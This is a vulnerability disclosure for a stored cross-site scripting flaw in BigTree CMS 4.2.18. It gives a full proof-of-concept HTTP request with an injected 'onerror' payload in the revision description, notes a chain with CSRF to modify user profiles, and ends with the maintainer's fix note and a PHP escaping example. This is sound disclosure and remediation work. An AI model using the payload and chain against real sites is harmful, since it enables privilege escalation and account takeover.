Cross-site Scripting (XSS) in bigtreecms 4.2.18

We can use low-privileged (administrator) users to attack high-privileged (Developer) users. Combined with this CSRF (http://www.victim.com/BigTree-CMS-4.2.18/site/index.php/admin/users/profile/update/), we can modify any user profile.

POC:
1. Add an administrator user 222222
2. Log in with user 222222
3. Request http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/ and save a published revision:

POST /BigTree-CMS-4.2.18/site/index.php/admin/ajax/pages/save-revision/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/
Content-Length: 163
Cookie:
Connection: keep-alive

id=c0&description=%22%3E%3Cimg+src%3D1+onerror%3Dalert(%2Fxss%2F)%3E&csrf_token_YCH2Q3YC6Y9RTA4D3T4KKNG80WAKCF88=nZuaRAB4lBqfc9YHAERQAiA1z1N0F3j48sKEQPM4vvE%3D

The param description has an XSS vuln.
4. When the developer user logs in and requests http://127.0.0.1/BigTree-CMS-4.2.18/site/index.php/admin/pages/revisions/0/, the developer user will be XSSed~

thank you~
email: xfkxfk@secbook.net
54f51b2: Fixing unescaped description when saving a published revision. Thanks xfkxfk! #294
Fixed! Thank you!
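The commit above describes the fix as escaping the revision description. The following is an added illustration of that kind of escaping in PHP; it is not BigTree CMS code and the function name, the render context, and the sample value are assumptions for the example.

```php
<?php
// Added example (not BigTree CMS code): HTML-escape a revision description so
// that any markup in the submitted value is rendered as literal text.
// The function name is an assumption for illustration.
function escapeRevisionDescription(string $description): string
{
    // ENT_QUOTES escapes both double and single quotes, which matters when the
    // value is echoed inside an attribute; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of returning an empty string.
    return htmlspecialchars($description, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample: the URL-decoded form of the "description" value shown
// in the report's request. It tries to close a quoted attribute and open a tag.
$submitted = '"><img src=1 onerror=alert(/xss/)>';

$safe = escapeRevisionDescription($submitted);

// In both an attribute context and an element-text context, the escaped value
// cannot terminate the attribute or start a new element, so the browser shows
// it as text rather than parsing it as markup.
echo '<input type="text" name="description" value="' . $safe . '">' . PHP_EOL;
echo '<p>' . $safe . '</p>' . PHP_EOL;
```

Escaping at the point of output is the more robust habit than escaping once at save time, because a value stored in the database may later be rendered in more than one context; if the value is escaped on save (as the commit message describes), every existing read path must avoid escaping it a second time.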